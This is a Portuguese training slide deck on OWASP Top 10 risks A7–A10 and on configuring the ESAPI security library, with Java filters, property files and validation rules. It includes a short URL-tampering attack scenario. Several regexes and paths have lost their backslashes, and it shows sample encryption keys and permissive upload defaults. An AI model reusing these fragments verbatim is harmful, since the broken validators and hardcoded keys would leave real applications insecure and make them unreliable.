76 OWASP Top 10  A7: Armazenamento criptográfico inseguro Como evitar: • Utilizar o módulo Encryptor da biblioteca ESAPI para realizar a criptografia de dados sensíveis, utilizando parâmetros de criptografia que envolvem algoritmos adequados e chaves fortes guardadas em um arquivo de configuração protegido: String secret = "Secret Message"; CipherText encrypted = ESAPI.encryptor() .encrypt( new PlainText( secret ) ); PlainText decrypted = ESAPI.encryptor().decrypt( encrypted );
77 OWASP Top 10  A8: Falha ao restringir o acesso às URLs Observações: • Muitas aplicações Web verificam os direitos de acesso a uma URL antes de exibirem links e botões protegidos. • As aplicações devem realizar verificações de controles de acesso semelhantes cada vez que estas páginas são acessadas. Caso contrário, os atacantes podem forjar URLs e acessar estas páginas escondidas, sem qualquer controle.
78 OWASP Top 10  A8: Falha ao restringir o acesso às URLs Como evitar: • As políticas de autenticação e autorização deverá ser baseada em papéis (RBAC - role based access control), para minimizar o esforço necessário para manter estas políticas. • As políticas devem ser altamente configuráveis, de modo a minimizar qualquer aspecto codificado da política. • O mecanismo de execução deve por padrão negar todos os acessos, necessitando de permissões explícitas para usuários e papéis específicos para permitir o acesso a cada página. • Se a página está envolvida em um fluxo de trabalho, é necessário verificar se as condições estão em um estado apropriado para permitir o acesso aos recursos.
79 OWASP Top 10  A8: Falha ao restringir o acesso às URLs Cenário de ataque: • O atacante simplesmente modifica o apontamento da URL de destino no browser URL gerada pela aplicação: URL adulterada: http://example.com/app/getappInfo ← acesso legítimo http://example.com/app/admin_getappInfo ← acesso indevido
80 OWASP Top 10  A8: Falha ao restringir o acesso às URLs Como evitar: • Verificar se o usuário tem permissão de acessar a URL –É recomendável que esta verificação seja implementada na forma de um filtro java para verificar o acesso a todas as páginas ESAPI.accessController().isAuthorizedForURL(request.getRequestURI());
81 OWASP Top 10  A8: Falha ao restringir o acesso às URLs Como evitar: • Verificação implementada na forma de Filtro Java public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain) throws IOException { if ( !ESAPI.accessController() .isAuthorizedForURL(request.getRequestURI()) ) { request.setAttribute("message", "Acesso não autorizado!" ); RequestDispatcher dispatcher = request.getRequestDispatcher("WEB-INF/index.jsp"); //redireciona para página principal dispatcher.forward(request, response); return; } chain.doFilter(request, response); }
82 OWASP Top 10  A9: Proteção ineficaz da camada de transporte Características: • Ocorre quando as aplicações falham na autenticação, cifra e proteção da confidencialidade e integridade do tráfego de informações sensíveis na rede. • Quando o fazem, muitas vezes fazem com o uso de recursos e algoritmos fracos, muitas vezes usam certificados inválidos ou expirados, ou não os utilizam corretamente.
83 OWASP Top 10  A9: Proteção ineficaz da camada de transporte Como evitar: • Exigir conexão SSL em todas as páginas sensíveis. As requisições que não fazem uso de SSL para estas páginas devem ser redirecionadas para a respectiva página SSL. • Defina o flag "secure" em todos os cookies sensíveis. • Configure o seu provedor de SSL para usar apenas algoritmos de criptografia robustos • Certifique que o certificado é válido, não expirado, não revogado e corresponde a todos os domínios usados pelo site. • As conexões de backend e demais conexões devem utilizar as tecnologias de criptografia SSL ou outras similares.
84 OWASP Top 10  A9: Proteção ineficaz da camada de transporte Como evitar: • Boa parte do problema está na camada de comunicação SSL • A ESAPI pode ser usada para ajudar a: –Garantir que a comunicação seja realizada por meio de canal seguro (SSL) –Definir os flags dos cookies como 'secure' –Fornecer métodos que facilitam a criptografia/decriptografia dos dados.
85 OWASP Top 10  A9: Proteção ineficaz da camada de transporte Como evitar: • Garantindo a comunicação via canal SSL –garantir que o request use SSL e a passagem de parâmetros seja via POST –garantir apenas o uso do SSL try{ ESAPI.httpUtilities().assertSecureRequest(request); } catch ( AccessControlException ace) { } try{ ESAPI.httpUtilities().assertSecureChannel(request); } catch ( AccessControlException ace) { }
86 OWASP Top 10  A9: Proteção ineficaz da camada de transporte Como evitar: • Definindo os flags dos cookies como 'secure', encapsulando a requisição com o uso do wrapper SecurityWrapperRequest: HttpServletRequest safeReq = new SecurityWrapperRequest( request ); HttpServletResponse safeResp = new SecurityWrapperResponse( response );
87 OWASP Top 10  A9: Proteção ineficaz da camada de transporte Como evitar: • Utilizar métodos que facilitam a criptografia/decriptografia dos dados – ESAPI.encryptor().encrypt(PlainText message) – ESAPI.encryptor().decrypt(CypherText message) – ESAPI.httpUtilities().encryptQueryString(String query) – ESAPI.httpUtilities().decryptQuery(String encrypted) – ESAPI.httpUtilities().encryptHiddenField(String value) – ESAPI.httpUtilities().dencryptHiddenField(String encrypted)
88 OWASP Top 10  A9: Proteção ineficaz da camada de transporte Como evitar: • Criptografando a query string • Decriptografando a query string String url = "http://example.com/tela.jsp?encQuery="; String queryString = "field1=value1&field2=value2&field3=value3"; String urlEnc = url+ESAPI.httpUtilities().encryptQueryString(queryString); String encQueryParam = request.getParameter("encQuery"); java.util.Map<String, String> mapQueryString = ESAPI.httpUtilities().decryptQueryString(encQueryParam);
89 OWASP Top 10  A10: Redirecionamentos inseguros Características: • Ocorre quando as aplicações Web redirecionam e encaminham usuários para outras páginas e sítios de Web e usam para isto dados não confiáveis para determinar as páginas de destino. • Sem uma validação adequada, os atacantes podem redirecionar as vítimas para sítios de phishing ou malware, ou então usar o mecanismo de encaminhamento para acessar páginas não autorizadas.
90 OWASP Top 10  A10: Redirecionamentos inseguros Como evitar: • Não utilizar parâmetros dos usuários para o cálculo da URL de destino, ou então utilizar referências indiretas para as URLs. • Assegurar que o valor fornecido é válido e autorizado para o usuário. • Utilizar a ESAPI para realizar o processo de redirecionamento de maneira segura: ESAPI.httpUtilities().sendRedirect (response, request.getParameter("fwd")); ESAPI.httpUtilities().sendForward (request, response, request.getParameter("fwd"));
91 Biblioteca OWASP ESAPI O que é a ESAPI? • É uma API de segurança corporativa. • Desenvolvido pela OWASP • Licença BSD • Linguagens: – Java (Java EE) – .NET – ASP classico – PHP –ColdFusion –Python –Haskell –Javascript
92 Biblioteca OWASP ESAPI O que é a ESAPI? • É apenas uma coleção de blocos de segurança pré-moldados, de código aberto projetados para ajudar a equipar as aplicações existentes com a segurança. • ESAPI Framework Integration Project – Serão compartilhadas as melhores práticas para a integração. – Existe uma grande espectativa das equipes de frameworks como o Struts adotarem a ESAPI
93 Biblioteca OWASP ESAPI O que é uma API de segurança corporativa? • É uma API de alto nível que fornece funções comuns de segurança na forma de um serviço para a aplicação que faz uso da biblioteca. • É configurada de modo centralizado para manter a configuração separada da implementação. • Permite que os desenvolvedores não necessitem desviar o foco da atenção para escrever controles de segurança próprios para os componentes, promovendo assim o reuso. • Atende a um ambiente de desenvolvimento de código seguro e convenções de codificação. • Fornece uma API comum (em relação às interfaces), mas que também permite a customização ou extensão para se adaptar a ambientes específicos. Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
94 Biblioteca OWASP ESAPI Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
95 Biblioteca OWASP ESAPI Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
96 Biblioteca OWASP ESAPI Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
97 Biblioteca OWASP ESAPI ESAPI x SLDC O ciclo de desenvolvimento de sistemas (Systems Development Life Cycle - SDLC), ou ciclo de desenvolvimento de software em engenharia de sistemas e engenharia de software, é o processo de criação ou modificação de sistemas, com o uso de modelos e metodologias que são utilizados para desenvolver sistemas. Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
98 Biblioteca OWASP ESAPI ESAPI x SLDC Resposta: Em todas as fases! Em qual das fases a ESAPI se encaixa? Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
99 Biblioteca OWASP ESAPI Premissas Básicas: • Segurança não é um evento único: – Deve ser aplicado e aprimorado constantemente. • Processo de desenvolvimento: – Uma iniciativa de codificação segura deve abordar todos os estágios do ciclo de vida de um software. • Tratar o problema na raiz – Onde o esforço e o custo de correção são menores.
100 Biblioteca OWASP ESAPI Benefícios de identificar as falhas de segurança logo no início do ciclo de vida do desenvolvimento, onde o custo e o esforço de correção são baixos
101 Biblioteca OWASP ESAPI Ciclo de vida de requisição segura Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
102 Biblioteca OWASP ESAPI Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security Problemática atual:
103 Biblioteca OWASP ESAPI As vulnerabilidades originam-se de: • Controles inexistentes – Inexistência de mecanismo de criptografia; – Falha em realizar o controle de acesso • Controles Ineficientes – Algorítimo de geração de hash fraco, ex: MD5 – Mecanismo de tratamento de entrada/saída de dados desatualizado • Controles Ignorados – Falha no uso da criptografia – Trechos de código onde faltam as rotinas de codificação dos dados de saída Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
104 Biblioteca OWASP ESAPI Os controles de segurança que um desenvolvedor precisa devem ser: • Padronizados • Centralizados • Organizados • Integrados • Intuitivos • Testados • Devem possuir alta qualidade Resolve os problemas de controles inexistentes e ineficientes Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
105 Biblioteca OWASP ESAPI E o problema dos controles ignorados ? • As seguintes ações não solucionam, mas ajudam: – Guias de codificação – Análise estática – Treinamento de desenvolvedores – Testes unitários Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
106 Arquitetura Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
107 Tratando Configuração de Segurança da Aplicação Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
108 Configurando ESAPI Proteção dos arquivos de configuração (nível de SO): • Uma proteção no nível do sistema operacional deve ser empregada para proteger o diretório de recursos .esapi, incluindo todos os arquivos dentro do diretório e todos os caminhos que vão até o diretório raiz do sistema de arquivos. • Caso estiver usando implementações baseadas em arquivos (ex: FileBasedAuthenticator), alguns arquivos necessitam ter permissões de leitura e escrita (read-write) devido o fato de serem atualizados dinamicamente.
109 Configurando ESAPI • A ESAPI foi projetada para ser facilmente extensível. • As implementações de referência podem ser usadas, mas, caso necessário, podem ser substituídas por implementações próprias que se integram à infraestrutura de segurança já existente. • Isto permite que implementações de segurança sejam facilmente substituídas no futuro sem a necessidade de reescrever toda a aplicação.
110 Configurando ESAPI • É possível definir o classname para o provedor que se deseja utilizar para a aplicação cliente no arquivo ESAPI.properties. • O único requisito é que implemente a interface ESAPI apropriada. • O trecho do arquivo de configuração a seguir, mostra as referências definidas por padrão na biblioteca: (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...)
111 Configurando ESAPI (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=com.myapp.security.authenticator.MyAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=com.myapp.security.log.MyLogger ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) ESAPI.properties Configuração Original ESAPI.properties Configuração Modificada
112 Configurando ESAPI • Implementações que dependem de outros arquivos: (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) Requer arquivo users.txt no diretório .esapi Requer arquivo ESAPI-AccessControlPolicy.xml e URLAccessRules.txt no diretório .esapi Requer arquivo log4j.xml ou log4j.properties no classpath .esapi/ESAPI-AccessControlPolicy.xml .esapi/URLAccessRules.txt .esapi/users.txt
113 Validação, Codificação e Injeção Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
114 Tratando Validação e Codificação Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
115 Codificação e Decodificação de Dados não Confiáveis Fonte: OWASP ESAPI Javadoc
116 Configurando Encoder • A ESAPI realiza a canocalização dos dados de entrada antes de realizar a validação dos dados para prevenir tentativas de burlar os filtros com ataques codificados. • A canonicalização ocorre automaticamente quando se utiliza o Validator da ESAPI, mas também é possível invocar o método de canocalização diretamente, conforme o trecho de código a seguir: String result = ESAPI.encoder().canonicalize( request.getParameter("input") );
117 Configurando Encoder (...) #=========================================================================== # ESAPI Encoder # Encoder.AllowMultipleEncoding=false Encoder.AllowMixedEncoding=false Encoder.DefaultCodecList=HTMLEntityCodec,PercentCodec,JavaScriptCodec #=========================================================================== (...) Configuração Padrão • Permitir codificação múltipla • Permitir codificação mista • Lista de CODECs padrão
118 Configurando Encoder Encoder.AllowMultipleEncoding=false Multiple Encoding – Codificação Múltipla • Codificação multipla ocorre quando um formato de codificação é aplicado diversas vezes. • Permitir a codificação múltipla é uma prática totalmente desaconselhável.
119 Configurando Encoder Mixed Encoding – Codificação Mista • A codificação mista ocorre quando diferentes formatos de codificação são aplicados, ou quando múltiplos formatos são aninhados. • Habilitar a codificação mista é uma prática totalmente desaconselhável. Encoder.AllowMixedEncoding=false
120 Configurando Encoder 120 String result = ESAPI.encoder().canonicalize( "%22hello world&#x22;" ); 09/11/2010 10:24:40 org.owasp.esapi.reference.JavaLogFactory$JavaLogger log SEVERE: [Anonymous:null@unknown -> /IntrusionException] INTRUSION - Mixed encoding (2x) detected in %22hello world&#x22; Exception in thread "main" org.owasp.esapi.errors.IntrusionException: Input validation failure at org.owasp.esapi.reference.DefaultEncoder.canonicalize(DefaultEncoder.java:161) at org.owasp.esapi.reference.DefaultEncoder.canonicalize(DefaultEncoder.java:105) at Teste.main(Teste.java:114) 120 String result = ESAPI.encoder().canonicalize( "&#x22;hello world&#x22;" ); "hello world" String result = ESAPI.encoder().canonicalize( "%22hello world%22" ); "hello world"
121 Configurando Encoder CodeList – Lista de Codificadores • A lista de codificação padrão contém os codecs a serem aplicados quando estiver realizando a canocalização de dados não confiáveis • A lista deve incluir os codecs para todos os interpretadores ou decodificadores. Encoder.DefaultCodecList=HTMLEntityCodec,PercentCodec,JavaScriptCodec
122 Configurando Validator Possui as configurações de validação dos dados nos seguintes arquivos: • ESAPI.properties –Contém expressões regulares usadas pelos módulos da ESAPI • validation.properties –Contém expressões regulares criadas pelo próprios usuários
123 Configurando Validator (...) #=========================================================================== # ESAPI Encoder # Validator.ConfigurationFile=validation.properties # Validators used by ESAPI Validator.AccountName=^[a-zA-Z0-9]{3,20}$ Validator.SystemCommand=^[a-zA-Z-/]{1,64}$ Validator.RoleName=^[a-z]{1,20}$ #the word TEST below should be changed to your application #name - only relative URL's are supported Validator.Redirect=^/test.*$ (...) ESAPI.properties
124 Configurando Validator (...) # Global HTTP Validation Rules # Values with Base64 encoded data (e.g. encrypted state) will need at least [a-zA-Z0-9/+=] Validator.HTTPScheme=^(http|https)$ Validator.HTTPServerName=^[a-zA-Z0-9_.-]*$ Validator.HTTPParameterName=^[a-zA-Z0-9_]{1,32}$ Validator.HTTPParameterValue=^[a-zA-Z0-9.-/+=@_ ]*$ Validator.HTTPCookieName=^[a-zA-Z0-9-_]{1,32}$ Validator.HTTPCookieValue=^[a-zA-Z0-9-/+=_ ]*$ Validator.HTTPHeaderName=^[a-zA-Z0-9-_]{1,32}$ Validator.HTTPHeaderValue=^[a-zA-Z0-9()-=*.?;,+/:&_ ]*$ Validator.HTTPContextPath=^[a-zA-Z0-9.-/_]*$ Validator.HTTPServletPath=^[a-zA-Z0-9.-/_]*$ Validator.HTTPPath=^[a-zA-Z0-9.-_]*$ Validator.HTTPQueryString=^[a-zA-Z0-9()-=*.?;,+/:&_ %]*$ Validator.HTTPURI=^[a-zA-Z0-9()-=*.?;,+/:&_ ]*$ Validator.HTTPURL=^.*$ Validator.HTTPJSESSIONID=^[A-Z0-9]{10,30}$ # Validation of file related input Validator.FileName=^[a-zA-Z0-9!@#$%^&{}[]()_+-=,.~'` ]{1,255}$ Validator.DirectoryName=^[a-zA-Z0-9:/!@#$%^&{}[]()_+-=,.~'` ]{1,255}$ (...) ESAPI.properties
125 Configurando Validator Validator.SafeString=^[.p{Alnum}p{Space}]{0,1024}$ Validator.Email=^[A-Za-z0-9._%'-]+@[A-Za-z0-9.-]+.[a-zA-Z]{2,4}$ Validator.IPAddress=^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$ Validator.URL=^(ht|f)tp(s?)://[0-9a-zA-Z]([-.w]*[0-9a-zA-Z])*(:(0-9)*)*(/?)([a-zA-Z0-9-.?,:'/ +=&amp;%$#_]*)?$ Validator.CreditCard=^(d{4}[- ]?){3}d{4}$ Validator.SSN=^(?!000)([0-6]d{2}|7([0-6]d|7[012]))([ -]?)(?!00)dd3(?!0000)d{4}$ validation.properties Chamada referenciando expressão regular de validação: String input = request.getParameter("email"); int maxLength = 512; Boolean allowNull = false; try { someObject.setEmail( ESAPI.validator() .getValidInput("User Email", input, "Email", maxLength, allowNull)); }
126 Tratando Autenticação e Usuários Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
127 Configurando Authenticator (...) #=========================================================================== # ESAPI Authenticator # Authenticator.AllowedLoginAttempts=3 Authenticator.MaxOldPasswordHashes=13 Authenticator.UsernameParameterName=username Authenticator.PasswordParameterName=password # RememberTokenDuration (in days) Authenticator.RememberTokenDuration=14 # Session Timeouts (in minutes) Authenticator.IdleTimeoutDuration=20 Authenticator.AbsoluteTimeoutDuration=120 #=========================================================================== (...) Tentativas de login permitidas Número de senhas que não podem se repetir para determinado usuário Nome dos campos de login/senha do formulário de login Parâmetros de Timeout Tempo de duração do token em dias para implementar a funcionalidade “Rember me”
128 Tratando Controle de Acesso Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
129 Configurando AccessControl O módulo AccessControl depende dos seguintes arquivos e configuração: • ESAPI-AccessControlPolicy.xml (políticas de controle de acesso) • URLAccessRules.txt (regras de restrição de acesso às URLs) URLAccessRules.txt # Regras de Acesso a URL # /app/getappInfo | any | allow | /app/admin_getappInfo | admin | allow |
130 Tratando Referências Direta a Objetos Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
131 Tratando segurança no HTTP Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
132 Configurando HttpUtilities • O HttpUtilities provê proteção básica para as requisições e respostas HTTP. • Os métodos prioritariamente protegem contra dados maliciosos provenientes dos atacantes, comumente presentes em caracteres não imprimíveis, caracteres de escaping, e outros ataques mais simples. • O HttpUtilities também prove métodos úteis para tratar cookies, cabeçalhos e tokens CSRF.
133 Configurando HttpUtilities (...) #=========================================================================== # ESAPI HttpUtilties # Default file upload location (remember to escape backslashes with ) HttpUtilities.UploadDir=C:ESAPItestUpload HttpUtilities.UploadTempDir=C:temp # Force flags on cookies, if you use HttpUtilities to set cookies HttpUtilities.ForceHttpOnlySession=false HttpUtilities.ForceSecureSession=false HttpUtilities.ForceHttpOnlyCookies=true HttpUtilities.ForceSecureCookies=true # Maximum size of HTTP headers HttpUtilities.MaxHeaderSize=4096 # File upload configuration HttpUtilities.ApprovedUploadExtensions=.zip,.pdf,.doc,.docx,.ppt,.pptx,.tar,.gz,.tgz,.rar,.war,.jar,.ear,.xls,.rtf,.proper ties,.java,.class,.txt,.xml,.jsp,.jsf,.exe,.dll HttpUtilities.MaxUploadFileBytes=500000000 HttpUtilities.ResponseContentType=text/html; charset=UTF-8 # This is the name of the cookie used to represent the HTTP session # Typically this will be the default "JSESSIONID" HttpUtilities.HttpSessionIdName=JSESSIONID #=========================================================================== (...)
134 Tratando Informações Sensíveis Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
135 Tratando Informações Sensíveis Fonte: OWASP ESAPI Javadoc
136 Configurando Encryptor (...) #=========================================================================== # ESAPI Encryption # To calculate these values, you can run: # java -classpath esapi.jar org.owasp.esapi.reference.crypto.JavaEncryptor #Encryptor.MasterKey= ← #Encryptor.MasterSalt= ← Encryptor.PreferredJCEProvider=← # Warning: This property does not control the default reference implementation for # ESAPI 2.0 using JavaEncryptor. Also, this property will be dropped # in the future. # @deprecated Encryptor.EncryptionAlgorithm=AES # For ESAPI Java 2.0 - New encrypt / decrypt methods use this. Encryptor.CipherTransformation=AES/CBC/PKCS5Padding Encryptor.cipher_modes.combined_modes=GCM,CCM,IAPM,EAX,OCB,CWC Encryptor.cipher_modes.additional_allowed=CBC Encryptor.EncryptionKeyLength=128 (...)
137 Configurando Encryptor Geração do MasterKey e MasterSalt Comando: O resultado gerado será semelhantes a: java -classpath esapi.jar org.owasp.esapi.reference.crypto.JavaEncryptor Copy and paste these lines into ESAPI.properties #============================================================== Encryptor.MasterKey=a6H9is3hEVGKB4Jut+lOVA== Encryptor.MasterSalt=SbftnvmEWD5ZHHP+pX3fqugNysc= #============================================================== Obs.: Este processo apenas facilita a obtenção dos valores
138 Configurando Encryptor (...) #=========================================================================== # ESAPI Encryption # To calculate these values, you can run: # java -classpath esapi.jar org.owasp.esapi.reference.crypto.JavaEncryptor Encryptor.MasterKey=a6H9is3hEVGKB4Jut+lOVA== Encryptor.MasterSalt=FVD0iUJZR0ZhnPXn+UcFnpcUB84= Encryptor.PreferredJCEProvider=SunJCE # Warning: This property does not control the default reference implementation for # ESAPI 2.0 using JavaEncryptor. Also, this property will be dropped # in the future. # @deprecated # Encryptor.EncryptionAlgorithm=AES # For ESAPI Java 2.0 - New encrypt / decrypt methods use this. Encryptor.CipherTransformation=AES/CBC/PKCS5Padding Encryptor.cipher_modes.combined_modes=GCM,CCM,IAPM,EAX,OCB,CWC Encryptor.cipher_modes.additional_allowed=CBC (...) Utilizar valores obtidos para definir os valores de MasterKey e MasterSalt Se não for definido o valor padrão será SunJCE
139 Configurando Encryptor (...) Encryptor.ChooseIVMethod=random Encryptor.fixedIV=0x000102030405060708090a0b0c0d0e0f Encryptor.EncryptionKeyLength=128 Encryptor.CipherText.useMAC=true Encryptor.PlainText.overwrite=true # Do not use DES except in a legacy situations. 56-bit is way too small key size. #Encryptor.EncryptionKeyLength=56 #Encryptor.EncryptionAlgorithm=DES # TripleDES is considered strong enough for most purposes. # Note: There is also a 112-bit version of DESede. Using the 168-bit version # requires downloading the special jurisdiction policy from Sun. #Encryptor.EncryptionKeyLength=168 #Encryptor.EncryptionAlgorithm=DESede Encryptor.HashAlgorithm=SHA-512 Encryptor.HashIterations=1024 Encryptor.DigitalSignatureAlgorithm=SHA1withDSA Encryptor.DigitalSignatureKeyLength=1024 Encryptor.RandomAlgorithm=SHA1PRNG Encryptor.CharacterEncoding=UTF-8 (...) Se for utilizar SunJCE sem nenhum Complemento, então deve substituir SHA1withDSA para DSA
140 Configurando Encryptor (...) Encryptor.ChooseIVMethod=random Encryptor.fixedIV=0x000102030405060708090a0b0c0d0e0f Encryptor.EncryptionKeyLength=128 Encryptor.CipherText.useMAC=true Encryptor.PlainText.overwrite=true # Do not use DES except in a legacy situations. 56-bit is way too small key size. #Encryptor.EncryptionKeyLength=56 #Encryptor.EncryptionAlgorithm=DES # TripleDES is considered strong enough for most purposes. # Note: There is also a 112-bit version of DESede. Using the 168-bit version # requires downloading the special jurisdiction policy from Sun. #Encryptor.EncryptionKeyLength=168 #Encryptor.EncryptionAlgorithm=DESede Encryptor.HashAlgorithm=SHA-512 Encryptor.HashIterations=1024 #Encryptor.DigitalSignatureAlgorithm=SHA1withDSA Encryptor.DigitalSignatureAlgorithm=DSA Encryptor.DigitalSignatureKeyLength=1024 Encryptor.RandomAlgorithm=SHA1PRNG Encryptor.CharacterEncoding=UTF-8 (...) Se for utilizar SunJCE Substituir SHA1withDSA para DSA
141 Tratando Exceções, Logs e Detecção de Intrusos Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
142 Tratando Exceções, Logs e Detecção de Intrusos Fonte: OWASP ESAPI Javadoc
143 Módulo Logger • Os níveis de registo definido por essa interface (em ordem decrescente) são: –Fatal (Crítico) –Error (Erro) –Warning (Aviso) –Info (Informativo) –Debug (Depuração) –Trace (Rastreamento)
144 Módulo Logger • Habilitando os níveis de registo: //DESABILITADO todos os níveis ESAPI.log().setLevel( Logger.OFF ); //Habilitando nível FATAL ESAPI.log().setLevel( Logger.FATAL ); //Habilitando nível ERROR ESAPI.log().setLevel( Logger.ERROR ); //Habilitando nível WARNING ESAPI.log().setLevel( Logger.WARNING ); //Habilitando nível INFO ESAPI.log().setLevel( Logger.INFO ); //Habilitando nível DEBUG ESAPI.log().setLevel( Logger.DEBUG ); //Habilitando nível TRACE ESAPI.log().setLevel( Logger.TRACE ); //Habilitando nível ALL ESAPI.log().setLevel( Logger.ALL );
145 Módulo Logger • Existem 4 tipos de eventos de Log: –SECURITY_SUCCESS –SECURITY_FAILURE –EVENT_SUCCESS –EVENT_FAILURE –EVENT_UNSPECIFED Logger.debug( Logger.EventType type, String message) Logger.error( Logger.EventType type, String message) Logger.fatal( Logger.EventType type, String message) Logger.info( Logger.EventType type, String message) Logger.trace( Logger.EventType type, String message) Logger.warning( Logger.EventType type, String message)
146 Módulo Logger Fonte: OWASP ESAPI Javadoc • Exemplos: ESAPI.log().debug( Logger.SECURITY_SUCCESS, “Teste1 – executando ActionX”); ESAPI.log().error( Logger.SECURITY_FAILURE, “Erro conexão SSL”); ESAPI.log().fatal( Logger.EVENT_FAILURE, “Falha de conexão com o banco”); ESAPI.log().info( Logger.EVENT_SUCCESS, “Usuario “+ user + “realizou cadastro!”); ESAPI.log().trace( Logger.EVENT_UNSPECIFED, “Entrou no loop”); ESAPI.log().warning( Logger.EVENT_UNSPECIFED, “Espaço em disco no limite!”);
147 Configurando Logger (...) #=========================================================================== # ESAPI Logging # Set the application name if these logs are combined with other applications Logger.ApplicationName=ExampleApplication # If you use an HTML log viewer that does not properly HTML escape log data, you can set LogEncodingRequired to true Logger.LogEncodingRequired=false # Determines whether ESAPI should log the application name. This might be clutter in some single-server/single-app environments. Logger.LogApplicationName=true # Determines whether ESAPI should log the server IP and port. This might be clutter in some single-server environments. Logger.LogServerIP=true # LogFileName, the name of the logging file. Provide a full directory path (e.g., C:ESAPIESAPI_logging_file) if you # want to place it in a specific directory. Logger.LogFileName=ESAPI_logging_file # MaxLogFileSize, the max size (in bytes) of a single log file before it cuts over to a new one (default is 10,000,000) Logger.MaxLogFileSize=10000000 #=========================================================================== (...)
148 Módulo Intrusion Detector • Monitora as requisições e toma ações pré-configuradas para determinadas ações • As ações são baseadas na ocorrências de determinadas exceções, como: – IntrusionException – AuthenticationHostException
149 Configurando Intrusion Detector • Cada evento possui um parâmetro .count, .interval, e .action que são configurados no arquivo ESAPI.properties. • As ações são tomadas conforme um limiar de quantidade de eventos definida em "count" que ocorrem no intervalo de tempo definida em "interval" (em segundos) • Todas as exceções do tipo EnterpriseSecurityExceptions podem ser monitoradas • O IntrusionDetector é configurável para realizar automaticamente as seguintes ações: – log – apenas fazer log da requisição feita pelo usuario – logout – fazer logoff da conta do usuario que gerou a exceção – disable – bloquear a conta do usuario que gerou a exceção
